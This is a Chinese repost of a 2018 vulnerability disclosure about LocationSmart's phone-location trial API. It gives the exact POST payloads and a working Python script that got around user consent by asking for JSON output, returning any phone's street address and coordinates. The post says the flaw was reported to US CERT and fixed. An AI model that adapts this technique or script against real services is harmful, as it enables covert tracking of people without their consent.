我代表原作者,Robertxiao。
5 月 16 日,我发现了 LocationSmart 网站的一个漏洞,无需身份验证或者同意,任何人都可以获取到美国几百米内的任何手机的实时定位。我会介绍一下如何发现漏洞以及漏洞的技术细节。
介绍
LocationSmart 是一家手机定位追踪服务,最近有新闻报道[1][2],它向第三方 Securus 出售地理位置信息,Securus 因为不正当使用信息而官司缠身。LocationSmart 通过和各种电信公司如 Verizon、At&t、T-Mobile、Sprint、加拿大的 bell、Rogers Telus 等合作,通过三角定位获取用户实时位置。请注意,无论用户是否同意了开启地理位置信息,LocationSmart 都可以获取到用户的位置,用户根本没有选择权。
背景
LocationSmart 提供了一个试用网页 https://www.locationsmart.com/try/,任何人都可以输入电话号码,手机点击同意,就可以在网页上看这台手机的位置了。
在选择跟踪我的手机之后,该页面会向https://www.locationsmart.com/try/api/ 发送个 POST 请求,并且使用一下有效的内容(这里用 8005551212 这个号码代替我的电话号码):
requestdata={"deviceType":"Wireless","deviceID":"8005551212","devicedetails":"true","carrierReq":"true"}&requesttype=statusreq.json
如果电话号码有效则回复:
{"uid":"REDACTED",
"requestTime":"2018-05-16T21:25:50.689+00:00",
"statusCode":0,
"statusMsg":"Success",
"deviceId":"8005551212",
"token":"TOKEN",
"locatable":"True",
"network":{"carrier":"T-Mobile","locatable":"True","callType":"wireless","locAccuracySupport":"Precise Possible","nationalNumber":"8005551212","countryCode":"1","regionCode":"US","regionCountry":"UNITED STATES"},
"subscriptionGroup":[{"name":"LOCA-D01-LOCNOPIN","locatable":"False","smsAvailable":"False"},{"name":"LOCA-D02-WELCOME","locatable":"False","smsAvailable":"False"}],
"smsAvailable":"True",
"privacyConsentRequired":"True",
"clientLocatable":"false",
"clientSMSAvailable":"Not supported",
"whiteListed":"false"}
(有些字段已匿名)Token 是个 12 字节的值,使用经过修改的 Base64 版本解码来实现纳米级时间的传输。
该网页然后重复 POST 到具有以下有效载荷的相同端点:
requestdata={"subscriptionAction":"status","tn":"8005551212","carrierReq":"true"}&requesttype=subscriptionreq
并且会接受如下格式的 XML 负载:
等待subscriptionOptInState变为approved,然后对具有以下有效负载的相同端点发出最终的 POST 请求:
requestdata={"civicAddressReq":"True","geoAddressReq":"True","extAddressReq":"True","nearbyPoiReq":"True","privacyConsent":"True","token":"TOKEN","locationtype":"network","accuracyReq":"Coarse","tnDetailReq":"False","carrierReq":"true"}&requesttype=locreq
这会回复一个包含目标设备位置的 XML 负载。请注意,token作为唯一标识符在这个 request 中是不同的,它与从statusreq请求中获取的令牌相同。
如果你向没有同意展示地址信息的手机发送 POST 请求,你会得到如下结果:
漏洞
只需要向requesttype=locreq.json 提出同样 request,就能获得完整数据位置而无需目标手机同意。这是一个我能获取任何人数据位置的秘密。从本质上,他通过 JSON 格式请求位置数据,而不是默认的 XML 格式,出于某种原因,这样可以越过「同意」直接检查数据。
具体的操作如下:
1.通过 POST:
requestdata={"deviceType":"Wireless","deviceID":"NUMBER","devicedetails":"true","carrierReq":"true"}&requesttype=statusreq.json
获取一个 token。
2.通过 POST:
requestdata={"civicAddressReq":"True","geoAddressReq":"True","extAddressReq":"True","nearbyPoiReq":"True","privacyConsent":"True","token":"TOKEN","locationtype":"network","accuracyReq":"Coarse","tnDetailReq":"False","carrierReq":"true"}&requesttype=locreq.json
等几秒获取地址
这就是全部破解过程,不需要任何同意,就可以定位任何电话。
我为了证明这个可行,构建了一个 Python 脚本:
#!/usr/bin/env python3
import requests
import json
import sys
import webbrowser
if len(sys.argv) >= 2:
phone = sys.argv[1]
else:
phone = input("Phone number? ")
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:60.0) Gecko/20100101 Firefox/60.0',
'DNT': '1'
}
r1 = requests.post('https://www.locationsmart.com/try/api/',
headers=headers,
data={
'requestdata': json.dumps({"deviceType":"Wireless","deviceID":phone,"devicedetails":"true","carrierReq":"true"}),
'requesttype': 'statusreq.json'
}
)
data = r1.json()
r2 = requests.post('https://www.locationsmart.com/try/api/',
headers=headers,
data={
'requestdata': json.dumps({"civicAddressReq":"True","geoAddressReq":"True","extAddressReq":"True","nearbyPoiReq":"True","privacyConsent":"True","token":data['token'],"locationtype":"network","accuracyReq":"Coarse","tnDetailReq":"true","carrierReq":"true"}),
'requesttype': 'locreq.json'
}
)
data2 = r2.json()
if 'civicAddress' in data2:
print('{phone}: near {streetAddress}, {city}, {state} {zip}'.format(phone=phone, **data2['civicAddress']))
if 'geoAddress' in data2:
url = 'http://localhost:8000/location.html?lat={coordinates[1]}&lng={coordinates[0]}&acc={accuracy}'.format(**data2['geoAddress'])
webbrowser.open_new_tab(url)
这个脚本会弹出一个简单的 HTML 页面,可以绘制出目标电话的坐标。
注意!我已经联系美国 CERT 披露了这个严重的漏洞,今天上午该漏洞已被修复。
注释:
- [1]:US cell carriers are selling access to your real-time phone location data
- [2]:How a “location API” allows cops to figure out where we all are in real time
@园长:漏洞的破解难度很低,能发现也挺偶然的,幸好作者投诉了该漏洞,要不然被恶意使用后果不堪设想。另外这个地理位置信息是通过电信运营商获取到的,我觉得国内......
